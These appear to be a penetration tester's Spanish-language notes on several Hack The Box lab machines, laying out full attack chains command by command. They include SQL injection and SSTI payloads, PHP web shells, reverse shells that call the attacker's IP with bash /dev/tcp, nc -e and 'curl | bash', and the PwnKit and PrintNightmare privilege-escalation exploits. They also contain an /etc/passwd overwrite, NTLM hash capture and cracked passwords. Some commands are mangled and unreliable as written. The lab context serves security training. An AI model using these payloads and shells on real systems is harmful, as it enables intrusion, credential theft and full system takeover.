#IPs [ HTB: 10.10.15.138 ; Overflow: 10.10.11.119 ]

#Ping => ping -c 1 10.10.11.119 => ttl=63 => LINUX machine

#Nmap 1. nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.10.11.119 -oG allPorts 2. nmap -p22,25,80 -sCV 10.10.11.119 -oN targeted

#Info-web whatweb 10.10.11.119 -v nmap --script http-enum -p80 10.10.11.119 -oN webScan

#Launchpad OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 => Bionic Apache httpd 2.4.29 launchpad => Bionic

#Virtual hosting (Copyright © Overflow.HTB 2021) nano /etc/hosts => 10.10.11.119 overflow.htb

#Fuzzing (seclists) wfuzz -c --hc=404 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://overflow.htb/FUZZ.php => "index", "register", "login", "logout"

#Probar inyection form admin admin ; admin' ; admin' or 1=1-- - ; admin' or sleep(5)-- - ; admin and sleep(5)-- - (Invalid credentials)

#Inspect web (cookies, CBC = cifrado por bloques) storage cookie => auth = DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat

#Padbuster (padding oracle attack) ->descifrar : padbuster http://10.10.11.119/home/index.php DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat -cookies "auth=DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat" 8 ->cifrar : padbuster http://10.10.11.119/home/index.php DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat -cookies "auth=DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat" 8 -plaintext user=admin [+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

#Alternativa Burpsuite (bit fliper -> cookie haijacking) Registrar : bdmin -> send to intruder -> payloads (bit fliper (CBC)) -> start attack -> check length (bdim => check primeros bytes) 12696 -> 12712 => Cookie haijacking (meHq7KpnHo5NtAFF01qlmZE8GECiIYkB) => Admin Panel (Log to CMS made simple = http://10.10.11.119/admin_cms_panel/admin/login.php)

#Probar acceso desde terminal con CURL curl -s -X GET http://10.10.11.119/admin_cms_panel/admin/login.php | html2text

#Buscar vulnerabilidades CMS made simple (exploitdb) searchsploit cms made simple ; buscar version -> fuzear directorios http://10.10.11.119/admin_cms_panel/FUZZ => "doc" -> / "CHANGELOG.txt" => Version 2.2.8 searchsploit cms made simple 2.2. => SQL Injection , (Authenticated) Remote Code Execution , etc searchsploit -x php/webapps/46635.py => ver script(SQL Injection) => dump_salt(), dump_username(), dump_email(), dump_password() => crack_password() SALT = from+cms_siteprefs+where+sitepref_value searchsploit -m php/webapps/46635.py (copy .); mv 46635.py sqli.py ; python3 sqli.py ; (not accept python3)

#Logs => inspect(Q) => src=/config/admin_last_login.js => http://10.10.11.119/config/admin_last_login.js async function getUsers()let url = 'http://overflow.htb/home/logs.php?name=admin' => Unauthorized!! Misma pagina para arrastrar la cookie => 10.10.11.119/home/logs.php?name=admin => Last login : 16:00:00 Functional server (req,res) => name=admin') or 1=1-- -

#Ordenar datos SQL name=admin') order by 100-- - ; Find columns => order by 3-- - ; union select 1,2,3-- - ; union select 1,2,database()-- - ; version() ; user() ; load_file("/etc/passwd"); echo -n "/etc/passwd" | xxd => 0x2f6574632f706173737764 limit 0,1-- -- ; union select 1,2,schema_name from information_schema.schemata-- - ; union select 1,2,table_name schema_name from information_schema.tables where table_schema="cmsmsdb"-- - ; + limit 11,1-- - (limitar output)

#Script enumDB (ver en cd /exploits/enumdb.sh)

#Credentials ( ver en cd /content/credentials.txt)

#Crack passwords hashid c6c6b9310e0e6f3eb3ffeb2baff12fdd => [+] MD2 hash-identifier => [+] MD5 ; locate rockyou.txt ; john -w: /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt credentials.txt

#Vulner CMS made simple (salt => database =>') union select 1,2,sitepref_value from cmsmsdb.cms_iteprefs-- -) => /content/cmsSalt.txt

#Script crackPass (ver en cd /exploits/crackPass.py) python3 crackPass.py => La contraseña es alpha!@#$%bravo

#Probar acceso SSH ssh editor@10.10.11.119 => Permision denied

#Acces authenicated panel (http://10.10.11.119/admin_cms_panel/admin/login.php) searchsploit cms made simple 2.2. => (Authenticated) RCE(remote code execution) => searchsploit -x php/webapps/49345.txt => navigate to Extensions->User Defined Tags

#Reverse Shell name : test , code : exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.138/443 0>1'"); sudo nc -nlvp 443 => no acces

#More vulners Important buissines msg : "Make sure you check out devbuild-job.overflow.htb and report any UI related problems to devloper, use the editor account to authenticate."

#Add virtual host nano /etc/hosts => devbuild-job.overflow.htb ping -c 1 devbuild-job.overflow.htb reutilizacion de credenciales => editor:alpha!@#$%bravo => account ; upload resume ; tiff/jpeg/jpg format

#Upload malicious file pushd /home/vleon/Downloads -> download cat.jpg -> kitty +kitten icat cat.jpg -> upload -> http://devbuild-job.overflow.htb/home/profile/index.php?upload=0 touch cmd.php (view code sys call in /exploits) ; File type not supported ;

#File magic numbers file cmd.php ; file cat.jpg ;

#Catch upload route with Burpsuite (req,res) => ../../assets/data/upliid => ExifTool (detector metadatos) => ./exiftool /home/vleon/Desktop/vleon/htb/Overflow/exploits/cat.jpg File Name : 625318165bf3d0.40501954.jpg Directory : ../../assets/data/upliid -> ./exiftool cat.jpg -> inyect metadata -> ./exiftool -Comment="<?php system('whoami'); ?>" cat.php.jpg

#Exiftool 11.92 search exploit github from 7.44 to 12.23 BUG in DjVu code execution ; git clone https://github.com/OneSecCyber/JPEG_RCE ; ./exiftool -config eval.config runme.jpg -eval='system("ping -c 1 10.10.15.138")' tcpdump -i tun0 icmp -n ; upload runme.jpg => "10.10.11.119 > 10.10.15.138: ICMP echo request" ;

#Inyectar reverse shell -eval='system("curl 10.10.15.138 | bash")' ; nvim index.html (reves shell /exploits) ; python3 -m http.server 80 ; upload file <->

#Tratamiento tty script /dev/null -c bash , Ctrl+z , stty raw -echo; fg , reset xterm , export TERM=xterm, echo $SHELL , export SHELL=bash stty size => 46 174 , stty rows 46 columns 174

#Find flags find \-name user.txt 2>/dev/null ; cat user.txt -> Permission denied ; ls -l ;

#User pivoting (www-data, developer, tester, root) cd /var/www/html/config/ , cat db.php -> mysqli_connect => ("localhost","developer", "sh@tim@n","Overflow") ; su developer , pass = sh@tim@n , ssh developer@10.10.11.119 sh@tim@n, cd tester, id 1002(network) , cd / , find / -group network 2>/dev/null , /etc/hosts , cd /opt/ (enum system) , cat commontask.sh -> "#make sure its running every minute." - bash < <(curl -s http://taskmanage.overflow.htb/task.sh) ,

#DNS haijacking -> nvim task.sh (view bash script /exploits), sudo python3 -m http.server 80 ; developer nano /etc/hosts 10.10.15.138 taskmanage.overflow.htb ; nc -nlvp 443 -> tester , cat user.txt => e40b0ea8144c06797196192d7cf4852e , cd /root/ -> Permission denied , cd /opt/, ls -la , cd file_encrypt ,

#Ecalada Root (binarios SUID) find \-perm -4000 2>/dev/null , ./file_encrypt => This is the code 1804289383. Enter the Pin: "" , file file_encrypt -> setuid ELF 32-bit LSB , uname -a -> x86_64 GNU, Code static , Pin : 1234, aaaa x 80 (probar desbordamineto buffer) => Wrong Pin , mkdir binary -> nc -nlvp 443 > file_encrypt (save input in this file) <-> tester: nc 10.10.15.138 443 < file_encrypt ; validate data transfer -> md5sum file_encrypt (compare cadena) ; chmod +x file_encrypt (permisos execution) ; file file_encrypt ; checksec file_encrypt ; cat /proc/sys/kernel/randomize_va_space => 0 (disable ASLR / Address Space Layout Randomization ) ; ldd file_encrypt | grep libc ltrace ./file_encrypt -> puts("Wrong Pin") ; strace (mas verbose) ; strings file_encrypt

#Ghidra ( SRE desarollado x la NASA, desamblador binarios) ghidra , disown , new project (view /binary), buscar con que compara el PIN, LC_ALL=en_US.UTF-8 gdb ./file_encrypt -> gef info functions => check_pin ; selec variable , tap L , change name , doble tap -> go to function , random PIn (bucle for static), pinCode.c (view code /binary) , gef> dissas random ; return PINcomparation con xor (^ comparativa) ; gef> break *random+57 ; r => run program ; nvim generatePIN.py -> script del proceso (/binary) Pin long => to int -> -202976456 , name : AAAAAx222 => segmentation fault (desbordamineto buffer)

#Buffer over flow find offset : AAAA x�??? -> para sobreescribir registros -> A = 41(hexadecimal) EIP = Insctruction Pointer ("AAAA") 0x41... => gef> pattern create => [+] Saved as '$_gef0' => r => inyect pattern => look EIP => pattern offset $eip => Found at offset 44 python -c 'print("A"*44 + "B"*4);' => EIP = "BBBB" -> 0x42424242 ; checksec -> data execution prevention (no se puede cambiar el direccionamiento del EIP) ; disass (desambla) encrypt (otra function que corre) ; flujo programa => f encrypt => formato little endian direccion -> python -c 'print("A"*44 + "\x5b\x58\x55\x56");' next function Enter Input File : /etc/passwd , Enter encrypted file : (check script /exploits/encrypter.py); pwd /opt/file_encrypt ; /tmp/ -> cp /etc/passwd file.txt python3 encrypt.py , cat file.encrypted , ls -l /opt/file_encrypt/ -> binario SUID / owner root , mv file.txt passwd , control de la ruta de exportacion que ejecuta el programa => openssl passwd : hola,hola -> b0mbzKMgcIO0o ; nano passwd -> root:x:0:0.. => root:b0mbzKMgcIO0o:0:0.. ; volver a ^ (desencriptar) antes de volcar /etc/passwd python3 encrypt.py -> output_encrypted_file = "/tmp/passwd.encrypted" ; mv passwd.encrypted passwd ; Enter Input File: /tmp/passwd , Enter Encrypted File: /etc/passwd ; cat /etc/passwd -> root:b0mbzKMgcIO0o:0:0:root:/root:/bin/bash ; su root , password : hola ; flag: 075453c62ff67efdd50b4e975247ff60

# PING ping -c1 10.10.11.105 ttl=63 = LINUX ping -c1 10.10.11.105 -R

# NMAP nmap -p- --open -T5 -v -n 10.10.11.105 nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.105 -oG allPorts ./portDiscovery.sh

# PORT SERVICES nmap -sCV -p22,80 10.10.11.105 -oN targeted --- www --- Launchpad ( ver versiones ) whatweb 10.10.11.105 = no address

# etc/hosts Añadir horizontall.htb a DNS resolve 10.10.11.105 nano /etc/hosts ping -c1 horizontall.htb

# Enumerar servicios WEB ( fuzzing ) whatweb 10.10.11.105 nmap --script http-enum -p80 horizontall.htb -oN webScan wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://horizontall.htb/FUZZ

# Ver source-code curl -s -X GET "http://horizontall.htb/" | bat -l html | grep -oP '".*?"' | grep app\. | sort -u

# Filtrar curl -s -X GET "http://horizontall.htb//js/app.c68eb462.js" | grep "\.htb" | bat -l html | grep -oP '".*?"' | grep http RESULTADO [SUBDOMAIN] = http://api-prod.horizontall.htb/reviews ADD TO etc/hosts curl -s -X GET "http://api-prod.horizontall.htb/reviews" | jq

# Fuzzear API wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/FUZZ" curl -s -X GET "http://api-prod.horizontall.htb/users" | jq curl -s -X GET "http://api-prod.horizontall.htb/Admin" = http://api-prod.horizontall.htb/admin/auth/login Fitro por codigos de error y por palabras wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/admin/FUZZ" wfuzz -c -t 200 --hc=404 --hh=854 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/admin/FUZZ" curl -s -X GET "http://api-prod.horizontall.htb/Admin/init" | jq

# Exploits searchsploit "strapiVersion": "3.0.0-beta.17.4" searchsploit -m multiple/webapps/50239.py mv 50239.py strapi_ex.py python3 strapi_ex.py http://api-prod.horizontall.htb/

# Escucha *tcpdump -i tun0 icmp -n ping -c1 10.10.14.159 *nc -nlvp 443 nc -e /bin/bash 10.10.14.159 443 bash -i /dev/tcp/10.10.14.159/443 01 bash -c "bash -i /dev/tcp/10.10.14.159/443 01" bash -c "bash -i %26 /dev/tcp/10.10.14.159/443 0%261" *python3 -m http.server 80 curl http://10.10.14.159/test nano index.html cd /Horizontall/exploits python3 -m http.server 80 cd / ; curl http://10.10.14.159 curl http://10.10.14.159/ | bash

# Maquina victima hostname -I ifconfig = 10.10.11.105

# Tratamiento tty script /dev/null -c bash ctrl+z = suspended nc -nlvp 443 stty raw -echo; fg = continued nc -nlvp 443 reset xterm echo $TERM = dumb = export TERM=xterm echo $SHELL = sh = export SHELL=bash stty size = 24 80 = 52 189 = stty rows 52 columns 189 USER FLAG = 86318e9b1fae08287c589d9f7888acad

# Escalar privilegios grep -r -i password = "password": "#J!:F9Zt2u" cat database.json = "username": "developer" = "client": "mysql" mysql -u developer -p show databases; use strapi; show tables; select * from strapi_administrator; = admin@horizontall.htb : $2a$10$rHlTpnQP4VCrTKPvBudaeOtQqNvdgb5Fm4YH9A0KeJKJLBE9QCKia which pkexec which pkexec | xargs ls -l which gcc make git clone https://github.com/berdav/CVE-2021-4034 zip -r comprimido.zip CVE-2021-4034/ python3 -m http.server 80 = wget http://10.10.14.159/comprimido.zip unzip comprimido.zip cd CVE-2021-4034 make ( compilar) ./cve-2021-4034 ( ejecutar ) whoami ; bash ; cd /root/ ; ls ; cat root.txt ROOT FLAG = 3d6a17b1e621e0442716e8019c62ca60

# Escalada alternativa Buscar privilegios SUID = find \-perm -4000 2/dev/null Tareas cron = cat /etc/crontab Puertos abiertos = netstat -nat curl localhost:8000 = Laravel v8 (explotable) REMOTE PORT FORWARDING chisel = git clone ; cd chisel ; go build -ldflags "-s -w" . ; wget http://10.10.14.159/chisel ; chmod +x chisel ./chisel server --reverse -p 1234 ./chisel client 10.10.14.159:1234 R:8000:127.0.0.1:8000 nmap -p8000 --open -T5 -v -n 127.0.0.1 ( close y open al tunelizar) http://localhost:8000/ (OPEN) git clone ...laravel exploit python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 whoami python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 'ifconfig' cat index.html python3 -m http.server 80 nc -nlvp 443 python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 'curl http://10.10.14.159/ | bash'

#PING ping -c1 10.10.11.131 ttl= 64 LINUX ping -c1 10.10.11.131 -R = Traceroute

#PUERTOS | xargs ... = concatenar comandos which = ver tools echo $PATH = ver rutas alternativas path 65535 puertos = 1 TCP ; 2 UDP nmap -p- --open -T5 -v -n 10.10.11.131 -nmap puertos abiertos temporizado(1-5) verbose no DNS

# nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.131 -oG allPorts -paquetes no mas lentos que 5000 x seg.,triple v mas info y -Pn (NO ARP resolucion DNS) , export grep file flecha derecha para ver la rapidez % cat allport # nmap -sCV -p22,80,111,3128,24007,49152,49153 10.10.11.131 -oN targeted -ver servicios puertos y export formato nmap file 22- SSH, 80 - HTTP, .....

# whatweb 10.10.11.131 (-v) vi /etc/hosts 10.10.11.131 steampunk-era.htb - agregar dominio go http://steampunk-era.htb

# Open SSL (49152) commonName=flustered.htb openssl s_client -connect 10.10.11.131:49152 -inspeccionar certificado ping flustered.htb vi /etc/hosts 10.10.11.131 flustered.htb ctrl+u ver sorce code flustered.htb

# Proxy (3128) Squid http proxy 4.6 curl --proxy http://10.10.11.131:3128 http://127.0.0.1 - necesito credenciales lsof -i:80 service apache2 status

# Port (24007) GlusterFS ( sistema archivos NAS ) apt search glusterfs - busca packetes que involucren gluster ( glusterfs-client, glusterfs-server ) apt install glusterfs-client glusterfs-server man gluster - ver parametros gluster --remote-host=10.10.11.131 volume list - vol1 y vlo2

# Montura mount -t glusterfs 10.10.11.131:/vol1 /mnt/flustered mkdir /mnt/flustered cat /var/log/glusterfs/mnt-flustered.log - DNS resolution failed on host flustered add flustered to /etc/hosts 10.10.11.131 flustered - could not load our cert at /etc/ssl/glusterfs.pem ls /etc/ssl mount -t glusterfs 10.10.11.131:/vol2 /mnt/flustered cd !$ - para ir al ultimo parametro del comando anterior ll - listar lista ( estructura mysql: mariaDb ) find \-name aria_log.00000001 2/dev/null locate aria_log.00000001 strings mysql_upgrade_info 10.3.31-MariaDB ls mysql strings ibdata1

# Docker (crear contenedor con la verion Mysql del victima) apt install docker.io docker images cd /tmp - mkdir mysql - cd mysql - cp -R /mnt/flustered/* . (copiar la montura de la victima) watch -n 1 ls -l = para ver cambio sobre descargas docker run --name mariadb -v /tmp/mysql:/var/lib/mysql -d mariadb:10.3.31 (crear contenedor) docker exec -it mariadb bash (bash en el contenedor)

# Mysql docker exec -it mariadb mysql docker stop mariadb docker ps ; docker ps -a -q ; docker rm c90c8b9f6487 ; Editando el archivo de conf para cargar el plugin : - docker run --name mariadb -v /tmp/mysql:/var/lib/mysql -v /tmp/socket.cnf:/etc/mysql/mariadb.conf.d/socket.cnf -d mariadb:10.3.31 show databases; use squid; show tables; select * from passwd; = lance.friedman | oWJ5-jD5^m3

# Proxy con credenciales curl --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' http://127.0.0.1 # Listar rutas (gobuster) gobuster dir --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://127.0.0.1 *Error simbolos especiales* = pasar a hexa = man ascii = URLencode ( = %3E ...) - [-- http://127.0.0.1/app/] + [-x py] = curl --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' http://127.0.0.1/app/app.py | cat -l py # Site hack (Flask = Server Side Template Inyection) curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '"siteurl""caca"' ; '"siteurl":"9*9"'

# Burpsuite (tunelizado) burpsuite /dev/null curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '"siteurl":"9*9"' --proxy http://127.0.0.1:8080 - redirigir al proxy burpsuite ( Intercept - Repiter curl - SSTI ) # SSTI ( payloadallthethings ) tcpdump -i tun0 icmp -n ( escucha mi equipo ) \" - para escapar el encapsulado "" SEND PING desde victima a mi curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '"siteurl": "% for x in ().__class__.__base__.__subclasses__() %% if \"warning\" in x.__name__ % x()._module.__builtins__[\"__import__\"](\"os\").system(\"ping -c1 10.10.14.163\"%endif%%endfor%"' GANAR ACCESO cd /home/vleon/Desktop/vleon/HTB/Flustered/content montar servidor python : python3 -m http.server 80 system(\"curl 10.10.14.163\") = 10.10.11.131 - - [16/Feb/2022 20:53:19] "GET / HTTP/1.1" 200 - nano index.html = "#!/bin/bash bash -i /dev/tcp/10.10.14.163/443 01" nc -nlvp 443 - otra escucha system(\"curl 10.10.14.163 | bash\") ESCALADA whoami ; hostname -I ; which pkexec | xargs ls -l

# Tratamiento shell Seudoconsola = script /dev/null -c bash ctrl+z = suspend zsh stty raw -echo; fg = vuelve a netcat reset xterm = reseta consola echo $TERM =export TERM=xterm export SHELL=bash

# Investigar maquina hostname -I ; ls ; cd /home/ ; cd jennifer/ ; grep "sh$" /etc/passwd (ver usuarios locales) TRANSFERENCIA FILES con NC (SSL) cd /etc/ssl nc -nlvp 443 glusterfs.ca ( atack) nc 10.10.14.163 443 glusterfs.ca ( victima ) umount /mnt/flustered mount -t glusterfs 10.10.11.131:/vol1 /mnt/flustered GENERAR CLAVE SSH cd /root/.ssh ssh-keygen ll .rw------- root root 2.5 KB Wed Feb 16 21:59:59 2022  id_rsa .rw-r--r-- root root 567 B Wed Feb 16 21:59:59 2022  id_rsa.pub - cambiar la id_rsa.pub por el file autorizedkey victima cat id_rsa.pub | tr -d '\n'| xclip -sel clip echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ.....' authorized_keys ssh jennifer@10.10.11.131 (sin contraseña) jeni flag - f9bf7cdb107c079f7b9f8bed3c7be950 find \-perm -4000 2/dev/null = buscar permisos SUID getcap -r / 2/dev/null = listar capabilidades

# Find network ports custom which docker ; docker images ; docker ps ; hostname -I; touch hostDiscovery.sh chmod +x hostDiscovery.sh nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 172.17.0.1 nmap -sn 172.17.0.0/24 echo $? = 0 exito, 1 no exito nano portDiscovery.sh chmod +x portDiscovery.sh ./portDiscovery.sh curl http://172.17.0.1:111

#PING ping -c1 10.10.11.142 ttl=63 = LINUX ping -c1 10.10.11.142 -R = [Trace route]

#NMAP nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.142 -oG allports nmap -p80 -sCV 10.10.11.142 -oN targeted

#Scan info whatweb 10.10.11.142 = WordPress 5.9 view-source:http://10.10.11.142:80

#Rutas simples nmap --script http-enum -p80 10.10.11.142 -oN webScan /wp-login.php ping -c1 pressed.htb = nano etc/hosts http://pressed.htb/wp-login.php admin = invalid password

#Probar inputs user web scriptalert("XXS")/script

#Tramitar peticiones web curl -s -X GET "http://pressed.htb/" -H "User-Agent: caca" = Inspeccionar web/ Red / Cabecera peticion / User Agent User agent es DINAMICO = cambiar x "caca"

#Probar inyeccion php curl -s -X GET "http://pressed.htb/" -H "User-Agent: php system('whoami');?"

#WpScan wpscan --url "http://pressed.htb" XML-RPC seems to be enabled: http://pressed.htb/xmlrpc.php Upload directory has listing enabled: http://pressed.htb/wp-content/uploads/ Descargar data = cd ../content ; mkdir wordpress; cd !$ ; wget -r http://pressed.htb/wp-content/uploads/ [!] http://pressed.htb/wp-config.php.bak [backup] curl -s -X GET "http://pressed.htb/wp-config.php.bak" tree | grep -v "index.html" rm -r pressed.htb/ #Tres intentos password XML-RPC (tareas remotas POST) = http://pressed.htb/xmlrpc.php curl -s -X POST "http://pressed.htb/xmlrpc.php" | cat Tramitar XML = curl -s -X POST "http://pressed.htb/xmlrpc.php" -d methodCallmethodNamesystem.listMethods/methodNameparams/params/methodCall' #Gestionar posts como admin pip3 install python-wordpress-xmlrpc python3 [consola interactiva] from wordpress_xmlrpc import Client from wordpress_xmlrpc.methods import posts client = Client("http://pressed.htb/xmlrpc.php", 'admin', 'uhc-jan-finals-2022') post = client.call(posts.GetPosts()) post ; dir(post[0]) ; (post[0]).link ; post[0].id .user .password .content wp:php-everywhere-block/php "code:JTNDJ...

#Base 64 JTNDJ...= echo "JTNDJ...=" | base64 -d; echo nano data = php echo "pre" . shell_exec($_REQUEST['cmd']) . "pre"; ? base64 -w 0 data; echo = PD9waHAgCgllY2hvICI8cHJlPiIgLiBzaGVsbF9leGVjKCRfUkVRVUVTVFsnY21kJ10pIC4gIjxwcmU+IjsKPz4K #Urlencode %3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E php --interactive echo urldecode("%3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E"); = "php echo(file_get_contents('/var/www/html/output.log')); ?" #Itroducir variables data para construir fake shell post[0] ; malicious_post = post[0] ; malicious_post ; malicious_post.content = 'contenido + cadena64 CMD' client.call(posts.EditPost(malicious_post.id, malicious_post)) /?cmd=whoami = concatenar a la url = www-data [maquina vistima] http://pressed.htb/index.php/2022/01/28/hello-world/?cmd=id # Scrips python y bash cd /contentn apt install rlwrap nano fakeshell.sh chmod +x fakeshell.sh rlwrap ./fakeshell.sh

# Privilegios pwd /var/www/html cd ../; pwd /var/www ls -l /home/htb cat /home/htb/user.txt = USERFLAG = b1bee9b0ac51d0b85e96526638050c58 uname -a lsb_release -a iptables -L

# Explotacion SUID which pkexec | xargs ls -l wget https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh cat pkwner.sh ; nano pkwner.sh from wordpress_xmlrpc.methods import media with open("pkwner.sh", "r") as f: filename = f.read() filename data_to_upload = 'name':'pkwner.png', 'bits': filename, 'type':'text/plain' client.call(media.UploadFile(data_to_upload)) bash /var/www/html/wp-content/uploads/2022/02/pkwner.png pushd /var/www/html ; nano cmd.php ; ?php system($_REQUEST['cmd']);? ; popd service apache2 start ; service apache2 status ; localhost/cmd.php http://localhost/cmd.php?cmd=whoami ;

# Consola tty vi ttyoverhttp.py python3 ttyoverhttp.py script /dev/null -c bash php --interactive cd /home ; mkdir pepe ; useradd pepe -d /home/pepe -s /bin/bash chown pepe:pepe pepe/ ; ls -l ; passwd pepe ; su pepe ; exit = ls -l /dev/shm cat /dev/shm/*output = evidencia still = rm -r /var/www/html/* echo hola /var/www/html/test.txt # Docker docker pull ubuntu docker run -it ubuntu bash exit

#IPs [ DRIVE:10.10.11.106 ] #PING ping -c1 10.10.11.106 = ttl=127 = Windows

#NMAP nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts nmap -sCV -p80,135,445,5985 10.10.11.106 -oN targeted

#Info WEB whatweb 10.10.11.106 -v WireShark = admin , admin curl -s -X GET -I 10.10.11.106

#Crackmapexec SMB crackmapexec smb 10.10.11.106 = domain:DRIVER ; Windows 10 Enterprise 10240 x64

#Recursos compartidos red (null session) smbclient -L 10.10.11.106 -N = ACCESS_DENIED smbmap -H 10.10.11.106 -u 'null' = [!] Authentication error

#Virtual Hosting (support@driver.htb) nano /etc/hosts = 10.10.11.106 driver.htb www.driver.htb

#ShellCommandFile (upload malicios file) [pentestlab.blog] pushd /home/vleon/HTB/Drive/exploits ; rm * ; ls ; vi file.scf ; ...IconFile=\\10.10.15.8\smbFolder\pentestlab.ico... popd = para volver a la ruta anterior

#Montar servicio SMB impacket-smbserver smbFolder $(pwd) -smb2support = submit file.scf = pass fly [Incoming connection (10.10.11.106,49555); AUTHENTICATE_MESSAGE (DRIVER\tony,DRIVER)] # Hash [ntlmversion2] cd /content ; vi hash ; john --wordlist=/usr/share/wordlists/rockyou.txt hash = liltony (tony)

# Check valid crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' = [+] DRIVER\tony:liltony [+ = OK] # Check WinRM crackmapexec winrm 10.10.11.106 -u 'tony' -p 'liltony' = [+] (Pwn3d!)

# Conect remote service [REMOTE MANAGEMENT USERS] evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony' = *Evil-WinRM* PS C:\Users\tony\Documents whoami = driver\tony ; ipconfig = 10.10.11.106 ; net user tony = Local Group Memberships *Remote Management Use*Users cd.. ; cd Desktop ; dir ; type user.txt ; d58fcbe6167b0b8f402ca71e796056e0; b671327af056d2926fce32dd0ffe6646 cd C:\Users\Administrator = PermissionDenied: ; C:\ whoami /priv ; C:\ whoami /all ; systeminfo = DENIED = reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName =

# Power App dev/ raw / = wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 ; vi PowerUp.ps1 = Invoke AllChecks = python3 -m http.server 80 = C:\ IEX(New-Object Net.WebClient).downloadString('http://10.10.15.8/PowerUp.ps1') # WinPeas cd C:\Windows\Temp ; mkdir Privesc ; cd Privesc ; upload /home/vleon/Descargas/winPEASx64.exe ; .\winPEASx64.exe # spoolsv wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 IEX(New-Object Net.WebClient).downloadString('http://10.10.15.8/CVE-2021-1675.ps1') Invoke-Nightmare -DriverName "Xerox" -NewUser "vleon" -NewPassword "vleon123$!" net user = Administrators = crackmapexec winrm 10.10.11.106 -u 'vleon' -p 'vleon123$!' = (Pwn3d!) evil-winrm -i 10.10.11.106 -u 'vleon' -p 'vleon123$!' ROOT FLAG = 2d423c4b5897360a8c6a186dd6ed3c7d

# IP ( Bolt: 10.10.11.114) # PING ping -c1 10.10.11.114 ping -c1 10.10.11.114 -R ttl=63 = LINUX

# NMAP - PUERTOS ABIERTOS: nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.114 -oG allPorts Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https/// - SERVICIOS PUERTOS: nmap -sCV -p22,80,443 10.10.11.114 -oN targeted 22 / OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 80 / nginx 1.18.0 / 443 / ssl / /auth/login?redirect=%2F / commonName=passbolt.bolt.htb [add DNS to /etc/hosts]

# Inspeccionar certificado SSl (443) openssl s_client -connect 10.10.11.114:443 # Investigar web (http y https) whatweb 10.10.11.114 -v http://10.10.11.114 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[example@company.com], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.114], JQuery, Meta-Author[Themesberg], Open-Graph-Protocol[website], Script, Title[Starter Website - About] [Title element contains newline(s)!], nginx[1.18.0] nmap --script http-enum -p80,443 10.10.11.114 -oN infoweb /admin/controlpanel.php: Possible admin folder [POSIBLES RUTAS...] Download imagen.tar mv /home/vleon/Descargas/image.tar .

7z l image.tar = listar contenido comprimido [/json ...] tar -xf image.tar = descomprimir tree = ver contenido ordenado tree -fas | grep "layer.tar" | awk 'NFprint $NF' for file in $(tree -fas | grep "layer.tar" | awk 'NFprint $NF'); do echo -e "\n[+] List content file $file"; done for file in $(tree -fas | grep "layer.tar" | awk 'NFprint $NF'); do echo -e "\n[+] List content file $file"; 7z l $file; done | less -S

db.sqlite = ./a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar cd $(dirname ./a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar) tar -xf layer.tar ; ll ;file db.sqlite3 (ver magic nr) ; sqlite3 db.sqlite3 (connect file); .tables , select * from User; = 1|admin|admin@bolt.htb|$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.|| vi hash = john --wordlist=/usr/share/wordlists/rockyou.txt hash = MD5 = deadbolt (?); /login = http://10.10.11.114/admin/home

